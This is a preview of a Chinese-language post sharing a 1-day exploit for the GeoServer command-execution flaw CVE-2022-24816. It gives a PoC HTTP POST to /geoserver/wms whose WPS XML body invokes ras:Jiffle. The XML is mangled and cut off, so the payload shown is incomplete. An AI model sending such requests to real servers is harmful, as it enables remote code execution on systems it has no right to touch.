1day分享 ｜ Geoserver命令执行漏洞

文章预览

漏洞复现 CVE-2022-24816，geoserver命令执行漏洞 访问:http://127.0.0.1/geoserver/ows poc POST /geoserver/wms HTTP/1.1 Host: xxxxxxxxx Content-Type: application/xml Accept-Encoding: gzip, deflate "1.0" encoding= "UTF-8" ?>    "1.0.0" service= "WPS"  xmlns:xsi= "http://www.w3.org/2001/XMLSchema-instance"  xmlns= "http://www.opengis.net/wps/1.0.0"  xmlns:wfs= "http://www.opengis.net/wfs"  xmlns:wps= "http://www.opengis.net/wps/1.0.0"  xmlns:ows= "http://www.opengis.net/ows/1.1"  xmlns:gml= "http://www.opengis.net/gml"  xmlns:ogc= "http://www.opengis.net/ogc"  xmlns:wcs= "http://www.opengis.net/wcs/1.1.1"  xmlns:xlink= "http://www.w3.org/1999/xlink"  xsi:schemaLocation= "http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd" >      ras:Jiffle                                            "image/tiff">          result                ………………………………